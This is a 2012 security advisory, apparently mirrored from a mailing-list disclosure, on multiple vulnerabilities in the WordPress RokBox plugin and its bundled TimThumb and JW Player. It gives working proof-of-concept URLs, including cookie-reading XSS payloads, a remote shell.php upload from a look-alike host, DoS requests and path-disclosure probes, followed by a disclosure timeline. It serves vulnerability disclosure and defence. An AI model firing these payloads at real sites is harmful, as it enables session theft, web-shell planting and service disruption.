Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress RokBox Multiple Vulnerabilities

🗓️ 15 Dec 2012 00:00:00Reported by MustLiveType 
zdt
 zdt🔗 0day.today👁 23 Views

WordPress RokBox plugin has Cross-Site Scripting, Full path disclosure, Functionality Abuse, DoS, File Upload, Content Spoofing, and Information Leakage vulnerabilities

Code
Hello list!

I want to warn you about multiple security vulnerabilities in plugin Rokbox for WordPress.
 
These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload, Content Spoofing and Information Leakage vulnerabilities. Rokbox uses TimThumb 1.16 and JW Player 4.4.198, so some of vulnerabilities are related to plugin itself, some to TimThumb (vulnerabilities in which I've disclosed in 2011 and developer fixed them after my informing) and some to JW Player (vulnerabilities in which I've disclosed in 2012 and developer fixed them after my informing).
 
-------------------------
Affected products:
-------------------------

Vulnerable are Rokbox 2.13 and previous versions.
 
To CS and XSS in JW Player and FPD are vulnerable all versions of Rokbox for WordPress (Rokbox <= 2.13), but IL and vulnerabilities in TimThumb were fixed. After my informing in August the developers changed TimThumb to phpThumb, so version 2.13 isn't vulnerable to them.
 
----------
Details:
----------
 
XSS (WASC-08) (in versions of Rokbox with older versions of TimThumb):
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1111111&w=1
 
Abuse of Functionality (WASC-42):
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
 
DoS (WASC-10):
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
 
About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
 
Arbitrary File Upload (WASC-31):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php
 
This Arbitrary File Upload vulnerability in TimThumb was disclosed last year after 3,5 months after my disclosure of previous holes.
 
Content Spoofing (WASC-12):
 
In parameter file there can be set as video, as audio files.
 
Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site.
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/thumb.php?file=1.flv&image=1.jpg
 
Content Spoofing (WASC-12):
 
Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml.
 
http://site/wp-content/plugins/wp_rokbox/thumb.php?config=1.xml
 
1.xml
 
<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>
 
Content Spoofing (WASC-12):
 
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
 
XSS (WASC-08):
 
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
 
Information Leakage (WASC-13):
 
http://site/wp-content/plugins/wp_rokbox/error_log
 
Leakage of error log with full paths.
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/wp_rokbox/rokbox.php
 
------------
Timeline:
------------
 
2012.08.24 - announced at my site.
2012.08.28 - informed developers.
2012.08.29 - developers answered that they will look at it.
2012.12.14 - disclosed at my site (http://websecurity.com.ua/6006/). The developers haven't told me, which holes and in which versions they fixed, but my checking of the last version of RokBox showed that they fixed only part of the holes.
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Dec 2012 00:00Current
7High risk
Vulners AI Score7
wordpressrokbox pluginvulnerabilitiescross-site scriptingfull path disclosurefunctionality abusedosfile uploadcontent spoofinginformation leakagetimthumbjw playerexploit
23